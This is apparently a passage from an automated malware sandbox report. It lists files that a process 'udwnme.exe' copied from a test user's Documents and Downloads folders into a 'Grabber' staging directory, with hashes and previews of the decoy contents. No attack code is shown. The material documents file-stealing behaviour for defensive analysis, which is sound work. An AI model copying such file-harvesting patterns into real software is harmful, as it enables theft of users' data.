POBTVBINMSIPYONLYRKIHONKWHSUAJWIALOTZAQJSNTIH

                                                                  C:\Users\user\AppData\Local\404488eab03b565881eb6e0d9117d2d2\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Documents\VLZDGUKUTZ\VLZDGUKUTZ.docx

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.701757898321461
                                                                  Encrypted:false
                                                                  SSDEEP:24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
                                                                  MD5:520219000D5681B63804A2D138617B27
                                                                  SHA1:2C7827C354FD7A58FB662266B7E3008AFB42C567
                                                                  SHA-256:C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
                                                                  SHA-512:C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
                                                                  Malicious:false
                                                                  Preview:VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT

                                                                  C:\Users\user\AppData\Local\404488eab03b565881eb6e0d9117d2d2\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Documents\VLZDGUKUTZ\YPSIACHYXW.png

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.700014595314478
                                                                  Encrypted:false
                                                                  SSDEEP:24:ZUpld6DFp3zvtLC4Tmg3c0x2ngfNqdsD1OqVMyUXHt/Sv0vyjsbsV:upqDL3hO4TRc4Eq8tKvYgV
                                                                  MD5:960373CA97DEDBA8576ECF40D0D1E39D
                                                                  SHA1:E89C5AC4CF0B920C373CFA7D365C40C1009A14F6
                                                                  SHA-256:501DC438F0E931ABED9FDE388BA5A8FAE8445117823118C413F54793F0E10FD7
                                                                  SHA-512:93B34F6BC4DCEA41103E31272F2DC9CF07CC100F934CECC8F4317525DA65128DBBAD75B23CE40D46EE1DC11D10147250CAE33F01220F5624E2406B2596B726EB
                                                                  Malicious:false
                                                                  Preview:YPSIACHYXWDOAOALJCJYYKHKMGYIZBYLJSULATZCLAKGTHKIZZZPZMBAJFNQKRWGKHDEEYLGCRMYXVOJCXPRDOFVVXDFSZNRLGLUNBQSCSVJXKHLUFNOKRCASVQNUJDYWNWTNGJYBIKCERFIRWTZVUUNKNCMUGKTMSRIVLFQTZDVSHZTYRURNPZRSHICVPPIWUNOSYRCNVXHOFETKZDTIEIOQHCHWHDXEDXBZFSWIFFLXTXQXUBJCTQSDGVAMQKTUHJAAEDEECWFOEDCAALGNKEQRGJPVEEVJPTSROUZFPHKPUHLAYRHVULFESXXGKSAIYLAVSWMISSCMRGVQGXFGFYXBQBRZHILLZQUJRQJHUVBFDBPCNUAKOXURUUUKQNRUEAXAAXWIVATBILRXVUBDTFNWUQLPZELETXDQPCWJXRRAQILAVVZFAMGUWUYYORCQNUYLSNLTNXIAWJVDTPNCZPHSWYWWTBBJECMEGHRCATJANBKSCMLVOBOTXPKGMTOJISGOTUUOFVJPAGNMHFSAFRHQUHMYURLAJVNZPEMNMUDZAUMRZHQJBWVCUSQAENWUTRFBUFUWIPJYVLYDUIBJSTTFGSFBHTKIXJNVJUYJGSHZHMDONOHBMLQDTHGTPLYVKGUXWHEYTHTWOOMQOGUFQGRWUYBVWILTRHBAIJHZKXNAQYAIZBPYWWZSBDWNPRWGFXHNPFFMHKCCERIWCTACKIVXLZBNOTBYDOPJBYTZWNSXYXVYPHAGUHBXKPPAFNZGWEKOBPXTCLBIOEIVWLELPXJAINCDBEUOIFMNFWSRDONSGUCNGDZLIAFVNUQXZMTVJLIACGEXXESAGRKCPJNTKZHMMCTJZCLWNTNEJFUCODLVBCJHINWJYBLRXSKLVKNYGPLXGKEHMXSDKIAPHRGHBOCHQEJPMJEKRMRTLJNYNRHDPPQKJHXGYJMDUOESMBVJOBKJWUUSSZEQAGHANSYFBHIZFXSLENBLJWCHGEM

                                                                  C:\Users\user\AppData\Local\404488eab03b565881eb6e0d9117d2d2\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Documents\YPSIACHYXW.pdf

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.700014595314478
                                                                  Encrypted:false
                                                                  SSDEEP:24:ZUpld6DFp3zvtLC4Tmg3c0x2ngfNqdsD1OqVMyUXHt/Sv0vyjsbsV:upqDL3hO4TRc4Eq8tKvYgV
                                                                  MD5:960373CA97DEDBA8576ECF40D0D1E39D
                                                                  SHA1:E89C5AC4CF0B920C373CFA7D365C40C1009A14F6
                                                                  SHA-256:501DC438F0E931ABED9FDE388BA5A8FAE8445117823118C413F54793F0E10FD7
                                                                  SHA-512:93B34F6BC4DCEA41103E31272F2DC9CF07CC100F934CECC8F4317525DA65128DBBAD75B23CE40D46EE1DC11D10147250CAE33F01220F5624E2406B2596B726EB
                                                                  Malicious:false
                                                                  Preview:YPSIACHYXWDOAOALJCJYYKHKMGYIZBYLJSULATZCLAKGTHKIZZZPZMBAJFNQKRWGKHDEEYLGCRMYXVOJCXPRDOFVVXDFSZNRLGLUNBQSCSVJXKHLUFNOKRCASVQNUJDYWNWTNGJYBIKCERFIRWTZVUUNKNCMUGKTMSRIVLFQTZDVSHZTYRURNPZRSHICVPPIWUNOSYRCNVXHOFETKZDTIEIOQHCHWHDXEDXBZFSWIFFLXTXQXUBJCTQSDGVAMQKTUHJAAEDEECWFOEDCAALGNKEQRGJPVEEVJPTSROUZFPHKPUHLAYRHVULFESXXGKSAIYLAVSWMISSCMRGVQGXFGFYXBQBRZHILLZQUJRQJHUVBFDBPCNUAKOXURUUUKQNRUEAXAAXWIVATBILRXVUBDTFNWUQLPZELETXDQPCWJXRRAQILAVVZFAMGUWUYYORCQNUYLSNLTNXIAWJVDTPNCZPHSWYWWTBBJECMEGHRCATJANBKSCMLVOBOTXPKGMTOJISGOTUUOFVJPAGNMHFSAFRHQUHMYURLAJVNZPEMNMUDZAUMRZHQJBWVCUSQAENWUTRFBUFUWIPJYVLYDUIBJSTTFGSFBHTKIXJNVJUYJGSHZHMDONOHBMLQDTHGTPLYVKGUXWHEYTHTWOOMQOGUFQGRWUYBVWILTRHBAIJHZKXNAQYAIZBPYWWZSBDWNPRWGFXHNPFFMHKCCERIWCTACKIVXLZBNOTBYDOPJBYTZWNSXYXVYPHAGUHBXKPPAFNZGWEKOBPXTCLBIOEIVWLELPXJAINCDBEUOIFMNFWSRDONSGUCNGDZLIAFVNUQXZMTVJLIACGEXXESAGRKCPJNTKZHMMCTJZCLWNTNEJFUCODLVBCJHINWJYBLRXSKLVKNYGPLXGKEHMXSDKIAPHRGHBOCHQEJPMJEKRMRTLJNYNRHDPPQKJHXGYJMDUOESMBVJOBKJWUUSSZEQAGHANSYFBHIZFXSLENBLJWCHGEM

                                                                  C:\Users\user\AppData\Local\404488eab03b565881eb6e0d9117d2d2\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Documents\YPSIACHYXW.png

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.700014595314478
                                                                  Encrypted:false
                                                                  SSDEEP:24:ZUpld6DFp3zvtLC4Tmg3c0x2ngfNqdsD1OqVMyUXHt/Sv0vyjsbsV:upqDL3hO4TRc4Eq8tKvYgV
                                                                  MD5:960373CA97DEDBA8576ECF40D0D1E39D
                                                                  SHA1:E89C5AC4CF0B920C373CFA7D365C40C1009A14F6
                                                                  SHA-256:501DC438F0E931ABED9FDE388BA5A8FAE8445117823118C413F54793F0E10FD7
                                                                  SHA-512:93B34F6BC4DCEA41103E31272F2DC9CF07CC100F934CECC8F4317525DA65128DBBAD75B23CE40D46EE1DC11D10147250CAE33F01220F5624E2406B2596B726EB
                                                                  Malicious:false
                                                                  Preview:YPSIACHYXWDOAOALJCJYYKHKMGYIZBYLJSULATZCLAKGTHKIZZZPZMBAJFNQKRWGKHDEEYLGCRMYXVOJCXPRDOFVVXDFSZNRLGLUNBQSCSVJXKHLUFNOKRCASVQNUJDYWNWTNGJYBIKCERFIRWTZVUUNKNCMUGKTMSRIVLFQTZDVSHZTYRURNPZRSHICVPPIWUNOSYRCNVXHOFETKZDTIEIOQHCHWHDXEDXBZFSWIFFLXTXQXUBJCTQSDGVAMQKTUHJAAEDEECWFOEDCAALGNKEQRGJPVEEVJPTSROUZFPHKPUHLAYRHVULFESXXGKSAIYLAVSWMISSCMRGVQGXFGFYXBQBRZHILLZQUJRQJHUVBFDBPCNUAKOXURUUUKQNRUEAXAAXWIVATBILRXVUBDTFNWUQLPZELETXDQPCWJXRRAQILAVVZFAMGUWUYYORCQNUYLSNLTNXIAWJVDTPNCZPHSWYWWTBBJECMEGHRCATJANBKSCMLVOBOTXPKGMTOJISGOTUUOFVJPAGNMHFSAFRHQUHMYURLAJVNZPEMNMUDZAUMRZHQJBWVCUSQAENWUTRFBUFUWIPJYVLYDUIBJSTTFGSFBHTKIXJNVJUYJGSHZHMDONOHBMLQDTHGTPLYVKGUXWHEYTHTWOOMQOGUFQGRWUYBVWILTRHBAIJHZKXNAQYAIZBPYWWZSBDWNPRWGFXHNPFFMHKCCERIWCTACKIVXLZBNOTBYDOPJBYTZWNSXYXVYPHAGUHBXKPPAFNZGWEKOBPXTCLBIOEIVWLELPXJAINCDBEUOIFMNFWSRDONSGUCNGDZLIAFVNUQXZMTVJLIACGEXXESAGRKCPJNTKZHMMCTJZCLWNTNEJFUCODLVBCJHINWJYBLRXSKLVKNYGPLXGKEHMXSDKIAPHRGHBOCHQEJPMJEKRMRTLJNYNRHDPPQKJHXGYJMDUOESMBVJOBKJWUUSSZEQAGHANSYFBHIZFXSLENBLJWCHGEM

                                                                  C:\Users\user\AppData\Local\404488eab03b565881eb6e0d9117d2d2\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Documents\ZBEDCJPBEY.jpg

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.6994061563025005
                                                                  Encrypted:false
                                                                  SSDEEP:24:B08PKUcagX20VoXE+FZx/9wb8CokRMdpcUuDdgyzat15b9DZd7:B00KZagXRVyEC/9wbtor+DstLbXR
                                                                  MD5:A2EF8D31A8DC8EAFB642142CAE0BDDE5
                                                                  SHA1:6D33FA6AE5C8F3D94A889AF2AFBE701A8939BD4A
                                                                  SHA-256:A63D52B4D40DE4D08B155AB05F7B239F6B826D2E9AEF65D14C536CC17B117180
                                                                  SHA-512:0183DCD7C9808191B0D67319318EDB8069F15943CD9AFFDD5D905CA66471A301A3745EC2BDA93FD30400A08856F9530F8DB8A91555E910534E43591DE6588680
                                                                  Malicious:false
                                                                  Preview:ZBEDCJPBEYDZQGCVTGMBDASCMXWLERZBJTKXMSCERSGFDONQAMYGDFYKFYLRRNDSSGOWCSVJIWIVRJNDSQXJTTMAXVCSRDVBHJTJAHTUGCUAWHWEVTZMXBFFYFUVEYDCLBXZZXFGQTWOJCECEYXZGEOOJDMVGMJIBYUFGTAXZQFDALIISPEXNBMVCNQHJOUZVXMSFGVMMJSOTYBAIBARXRQIHGTHEJLHLQYVFLCLOFZPJJNGWGUFEFWDITXPCXBOEGYNGVEMPRSJBIUABRWYDIZIOEKFMGKERRXNEAUHHIGKJGZYYHOPIKNRRYEAZLMNYDGFIVIJPYMXKETIZCKXHUZFXIJHQQDRCSLMJZZJXMQYZJYWLCENOBYZRKIPDNTOCZBITNJXYFHPKLDLFNFTFPITPPGJYNAUOBLGWYVHPFDVDMRFKRTPDBLSNIHQBPMARNFKQAQJVIEOLDVNQKQXMHUIECHHCBWWKMSQPKKMTKTWVWEBVUAXWNLNMYEUBMGCGJTOJRQFGGHHLUDCSUNVREFGQLVZNTOMRGHSGVZCIEDGKHHTKATGJQYWMOXACOPMCHXJXNTBTSGCPUUSQVNCDVHCIQKUJWVUTGDNGWDNLQEWLMNYLKNVSFDBBIZZEHCDIMOJGCOBQZDWJNJPIEFNVWHFQSCSHGUQLBIQCMTBTOMPFZRCNWPIJILMFSCYXDRTMSMAVJZZGQJTZZACHQUIBTKCMOKJBPDOKJYCHADHETFJAVZAQIIWZRRGFSBGIIPYXFQSZKQPWXQCYERZGATQXEDAHDYBYZVROOBTIZFDOMRDVIUBHXTQOKCVSRLAYYMSBYFDGLRDCLXUKSNRGYDRFKSMAJGRBMDZLACAAKDZLPQZCVGELWTWVKPXDEMWCSQNQCJWQNLMOGJVDBANJWFKRRBFXUWVSMZLFJYCUJJORXEFPORKQLYKBMUOVWZKWNAHBCKBBJIYVVDQNIPFQZUTPFKYIRDTGOBWONUYXDVC

                                                                  C:\Users\user\AppData\Local\404488eab03b565881eb6e0d9117d2d2\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Documents\desktop.ini

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):402
                                                                  Entropy (8bit):3.493087299556618
                                                                  Encrypted:false
                                                                  SSDEEP:12:QZsiL5wmHOlDmo0qmUclLwr2FlDmo0IWF9klrgl2FlDmo0qjKAev:QCGwv4o0hlLwiF4o0UUsF4o01AM
                                                                  MD5:ECF88F261853FE08D58E2E903220DA14
                                                                  SHA1:F72807A9E081906654AE196605E681D5938A2E6C
                                                                  SHA-256:CAFEC240D998E4B6E92AD1329CD417E8E9CBD73157488889FD93A542DE4A4844
                                                                  SHA-512:82C1C3DD163FBF7111C7EF5043B009DAFC320C0C5E088DEC16C835352C5FFB7D03C5829F65A9FF1DC357BAE97E8D2F9C3FC1E531FE193E84811FB8C62888A36B
                                                                  Malicious:false
                                                                  Preview:......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.7.0.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.1.2.....I.c.o.n.F.i.l.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.....I.c.o.n.I.n.d.e.x.=.-.2.3.5.....

                                                                  C:\Users\user\AppData\Local\404488eab03b565881eb6e0d9117d2d2\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Downloads\HTAGVDFUIE.png

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.692693183518806
                                                                  Encrypted:false
                                                                  SSDEEP:24:FrPOQ32qakAnGkyNl2g/fQJnKVOvsyX1aZKx1aHEg:53Sq9/fiK4XQfHEg
                                                                  MD5:78F042E25B7FAF970F75DFAA81955268
                                                                  SHA1:F7C4C8DDF51B3C5293E0A92F6767D308BBF568B4
                                                                  SHA-256:E4C9709AFEA9D9830CED1AA6DF1711D0332A5972688640368DDC32C07C0D5D17
                                                                  SHA-512:CE2548833F62C549CA0268BE445E517AC986CA44EA52916A153DFFE4D7FA59B703E5927DFE70836E8B082C246793DF2066D72DB4A6E1C948940E88C524952348
                                                                  Malicious:false
                                                                  Preview:HTAGVDFUIELGZFCTZZGRSQISCXMOKSCAZEJVAPBPJKABIZKEGFAGMGOIUPHPJOYIWMVIKWCNUOWDMGCFXJQANMMOULIVTQQGUZVVOLZWBYTHYOHMMVIMTTBBCAIGONNRVEUMTCTCEMTWFNDSQPHEPLAFZAKYSROZKRQDUZOUZIKJGJRIBJODHOULJHWQBIJSAIYMXLFOSFOEFKTQPEEWFTFCIFSLHXSXYXBWTPCWMCGPETOSVLNKYCONFWCIUFEQKOWQNQKJSIZKNZXOQWMTJOGWDBUFBKDXUPYYIXUTOPSOVWLVKIOKFPSXDAVMBUZIYYZUQTDLZIMRRGXLTOEJMFWLOMNPNLICPZPKTHPXELGBYTJLOJOEWNRDNMXXRYMAJBWCTNMBREIJDVVIXEHEGYQKZQCGLVHOCMUSKXCQQMURLYKWUIUMFSGYMZUQXCTZOKQYXJAUDEVTSOOQUKZKKEEOANGSIIWTUVEGHTCOTXCDTCZIFUAWDLWKDNQTUAXBCRBKEGHCEPWTXOQVBWKIXLQEUCHHRHMKWOVVBFOLNUHSLLMHOOFDQCOVQVCNKKYOGNPYFHMPHXNPOTANYIGKSXGYDKBAEAYCNSDEQRTDZXKUOIUOHOMJPCCDXHJTXLKPCLAKLUNDAFZVUXKBSBAWUIBEQFANHTKLDXHBVLMBIXZUPHFUIHTECGPPEITWIRPTQHJDDRMAQERQMDOELBOQSEMMMCCUPQVDZXOFFYQSEIDXDPFNKRGYVUDDHHQGPRFUFAJOKTJSGMHWRXPZFPTHUACEOFEZUYOSJGJLFUTHTDWBPUETPFOWWTNVGDPCHGGCYSORPYRNRZVFDIQZLGVXSZLKMPDVKQURMLSZDDXVNBPXKBLQIKBTAWLYTZWTFUNWLSZPWUWBVBXUJMBCFHPMBIRGLQAWDQTJEHKOGMUTEILXROVHXNUORTTYMCMDGNZYCCCTIABCKYPUCGPPUUSBWLIPYZKIMRHFVZCGDPKZ

                                                                  C:\Users\user\AppData\Local\404488eab03b565881eb6e0d9117d2d2\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Downloads\HTAGVDFUIE.xlsx

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.692693183518806
                                                                  Encrypted:false
                                                                  SSDEEP:24:FrPOQ32qakAnGkyNl2g/fQJnKVOvsyX1aZKx1aHEg:53Sq9/fiK4XQfHEg
                                                                  MD5:78F042E25B7FAF970F75DFAA81955268
                                                                  SHA1:F7C4C8DDF51B3C5293E0A92F6767D308BBF568B4
                                                                  SHA-256:E4C9709AFEA9D9830CED1AA6DF1711D0332A5972688640368DDC32C07C0D5D17
                                                                  SHA-512:CE2548833F62C549CA0268BE445E517AC986CA44EA52916A153DFFE4D7FA59B703E5927DFE70836E8B082C246793DF2066D72DB4A6E1C948940E88C524952348
                                                                  Malicious:false
                                                                  Preview:HTAGVDFUIELGZFCTZZGRSQISCXMOKSCAZEJVAPBPJKABIZKEGFAGMGOIUPHPJOYIWMVIKWCNUOWDMGCFXJQANMMOULIVTQQGUZVVOLZWBYTHYOHMMVIMTTBBCAIGONNRVEUMTCTCEMTWFNDSQPHEPLAFZAKYSROZKRQDUZOUZIKJGJRIBJODHOULJHWQBIJSAIYMXLFOSFOEFKTQPEEWFTFCIFSLHXSXYXBWTPCWMCGPETOSVLNKYCONFWCIUFEQKOWQNQKJSIZKNZXOQWMTJOGWDBUFBKDXUPYYIXUTOPSOVWLVKIOKFPSXDAVMBUZIYYZUQTDLZIMRRGXLTOEJMFWLOMNPNLICPZPKTHPXELGBYTJLOJOEWNRDNMXXRYMAJBWCTNMBREIJDVVIXEHEGYQKZQCGLVHOCMUSKXCQQMURLYKWUIUMFSGYMZUQXCTZOKQYXJAUDEVTSOOQUKZKKEEOANGSIIWTUVEGHTCOTXCDTCZIFUAWDLWKDNQTUAXBCRBKEGHCEPWTXOQVBWKIXLQEUCHHRHMKWOVVBFOLNUHSLLMHOOFDQCOVQVCNKKYOGNPYFHMPHXNPOTANYIGKSXGYDKBAEAYCNSDEQRTDZXKUOIUOHOMJPCCDXHJTXLKPCLAKLUNDAFZVUXKBSBAWUIBEQFANHTKLDXHBVLMBIXZUPHFUIHTECGPPEITWIRPTQHJDDRMAQERQMDOELBOQSEMMMCCUPQVDZXOFFYQSEIDXDPFNKRGYVUDDHHQGPRFUFAJOKTJSGMHWRXPZFPTHUACEOFEZUYOSJGJLFUTHTDWBPUETPFOWWTNVGDPCHGGCYSORPYRNRZVFDIQZLGVXSZLKMPDVKQURMLSZDDXVNBPXKBLQIKBTAWLYTZWTFUNWLSZPWUWBVBXUJMBCFHPMBIRGLQAWDQTJEHKOGMUTEILXROVHXNUORTTYMCMDGNZYCCCTIABCKYPUCGPPUUSBWLIPYZKIMRHFVZCGDPKZ

                                                                  C:\Users\user\AppData\Local\404488eab03b565881eb6e0d9117d2d2\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Downloads\KATAXZVCPS.docx

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.699548026888946
                                                                  Encrypted:false
                                                                  SSDEEP:24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
                                                                  MD5:A0DC32426FC8BF469784A49B3D092ADC
                                                                  SHA1:0C0EEB9B226B1B19A509D9864F8ADC521BF18350
                                                                  SHA-256:A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
                                                                  SHA-512:DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
                                                                  Malicious:false
                                                                  Preview:KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG

                                                                  C:\Users\user\AppData\Local\404488eab03b565881eb6e0d9117d2d2\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Downloads\KATAXZVCPS.jpg

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.699548026888946
                                                                  Encrypted:false
                                                                  SSDEEP:24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
                                                                  MD5:A0DC32426FC8BF469784A49B3D092ADC
                                                                  SHA1:0C0EEB9B226B1B19A509D9864F8ADC521BF18350
                                                                  SHA-256:A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
                                                                  SHA-512:DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
                                                                  Malicious:false
                                                                  Preview:KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG

                                                                  C:\Users\user\AppData\Local\404488eab03b565881eb6e0d9117d2d2\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Downloads\KZWFNRXYKI.png

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.694982189683734
                                                                  Encrypted:false
                                                                  SSDEEP:24:MggAXr5945qa/jgwHvsjCIShLGmTSIp/6co4rHg+X:MgJXr5+pjBsUhJTSIGA
                                                                  MD5:E49F84B05A175C231342E6B705A24A44
